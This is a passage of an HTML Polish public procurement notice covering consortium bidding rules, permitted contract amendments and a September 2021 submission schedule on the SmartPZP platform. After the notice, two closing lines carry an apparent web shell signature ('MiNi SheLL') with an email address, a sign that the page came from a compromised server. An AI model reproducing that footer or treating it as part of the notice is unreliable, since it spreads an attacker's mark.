w SWZ, w tym w szczególności załączniku nr 1, 1A do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu zpostępowania. W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia (konsorcjum):<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać<br/>umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa<br/>załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3) oświadczenie, o którym mowa w art. 125 ust. 1 PZP składa każdy z wykonawców wspólnie<br/>ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia z<br/>postępowania oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Ww. oświadczenie<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia składane jest wraz z ofertą<br/>pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym.<br/>4) dokumenty, o których mowa w pkt 9.3. obowiązany będzie złożyć każdy z wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia<br/>5) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić<br/>odpowiedzialność solidarną za wykonanie umowy;<br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie<br/>Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania<br/>poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów;<br/>7) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w<br/>całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia łącznie lub każdego z osobna. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana postanowień Umowy jest możliwa poprzez:1)zmianę terminu realiza danej dostawy<br/>Wyrobów o okres odpowiadający wstrzymaniu lub opóźnien tego term w przypadku:a)skutków<br/>działan siły wyższej,rozumianej jako zdarzenia losowego wywołanego przez czynniki<br/>zewnętrzne,którego Str,pomimo zachowania należytej staranności,nie mogły przewidzieć ani mu<br/>zapobiec,o ile mają one wpływ na termin dostawy Asortymentu przez Wykonawcę,w tym w<br/>szczególnosci skutki działania siły wyżej w postaci epidemii,wojen,klęsk<br/>żywiołowych,b)wystąpienia okoliczności leżących wyłącznie po stronie Zamaw,których<br/>wystąpienia Zamaw,pomimo zachowania należytej staranności,nie mógł przewidzieć w dniu<br/>zawarciu Umowy;2)zmianę sposobu wykonania Przedm Umowy lub Wyrobów w<br/>przypadku:a)gdy ulegnie zmian stan prawny,w zakresie dotyczącym realizowanej Umowy,który<br/>spowoduje konieczność zmiany sposobu wykonania Przedm Umowy przez<br/>Wykonawcę,b)zmiany wielkoś opakowaniaz zachowaniem zasady proporcjonalności w stosunku<br/>do ceny jednostk za Wyrób,o ile zamiana taka nie będzie skutkować zmniejszeniem ilości szt<br/>dostarczon Wyrobu oraz nie będzie skutkować zmniejszeniem ilości szt dostarczanego Wyrobu<br/>oraz nie będzie skutkować zwiększeniem należnej Wykonaw ceny za dostarczenie tego Wyrobu<br/>w stosunku do jego ilości i ceny określonych w wyciągu z oferty Wykonaw,stanowiącej załnr 1 do<br/>Umowy,c)zmian nr kat bądź nazwy własnej Wyrobu z zastrzeżeniem,że będzie on spełniał<br/>wymagania określone w załnr 1 do Umowy,d)korzystania przez Zamawiaj z czasowych promocji<br/>cen Wyrobów,objętych Przedm Umowy, gdy Wykonaw poinformujeZamawiającego o przypadku<br/>promocji, wskazując który Wyrób jest nią objęty,w jakim okres trwa promocja oraz cenę<br/>promocyjną, dodatk przywołując oznaczenie Umowy, na podst,której dany wyrób medyc jest<br/>dostarczanye)zmianę przedmio dostawy poprzez zastąpienie Wyrobów wskazanych przez<br/>Wykon w ofercie innymi Wyrobami o analogicznym przeznaczeniu i spełniaj wszystkie wymogi<br/>określone przez Zamawiaj w dokumentach stanowiących zał nr 2 do Umowy;w szczególności<br/>lecz niewyłącznie zmiana taka jest dopuszczalna w przypadku pojawienia się Wyrobów<br/>nowsgeneracji,olepszychparametrach,właściwościach użytkowych,czy z innych przyczyn<br/>korzystniejszych dla Zamawiającego,3)zmianę terminu realizacji Przedmiotu Umowy w<br/>przypadku nie wyczerpania kwoty,o której mowa w § 2 ust.1,zzastrzeżeniem,że okres<br/>przedłużenia terminu realizacji Przedmiotu Umowy nie może być dłuższy niż 12<br/>miesięcy;4)zmianę miejsca dostawy, określonego w § 1 ust. 3 Umowy, poprzez wskazanie<br/>dodatkowego miejsca dostawy,znajdującego się w obrębie administracyjnym Gminy Miasto<br/>Szczecin, w przypadku wprowadzenia takiej zmiany Zamawiający zobowiązany będzie do<br/>każdorazowego wskazania w zleceniu miejsca dostawy.3.Zamawiający na podstawie art 436 pkt<br/>4 ustawy Pzp, przewiduje możliwość dokonania zmiany Wynagrodzenia w przypadkuwystąpienia: (i)zmiany stawki podatku od towarów i usług lub podatku akcyzowego,(ii)zmiany<br/>wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej,<br/>ustalonych na podstawie ustawy z dnia 10 października 2002 r. ominimalnym wynagrodzeniu za<br/>pracę,(iii) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu<br/>zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne lub (iv)<br/>zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których<br/>mowaw ustawie z dnia 4.10.2018r. o pracowniczych planach kapitałowych (Dz.U. z2018 r.<br/>poz.2215 z późn. zm.)jeżeli zmiany te będą miały wpływ na koszty wykonania Przedmiotu<br/>Umowy przez Wykonawcę.4.Warunki wprowadzenia treści zmian okreslono w pragf.8 ust.4 zał.<br/>nr 4 do SWZ.5.Zmian postanowień Umowy wymagają formy pisemnej pod rygorem<br/>niewaznosci.6. Niezależnie od postanowień niniejszego paragrafu Strony dopuszczają<br/>możliwość (i) zmian redakcyjnych Umowy oraz (ii) zmian danych Stron ujawnionych w rejestrach<br/>publicznych, niestanowiących zmiany, o której mowa w art. 455 ust. 1 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-14 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy (SmartPZP)</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-14 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-13</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com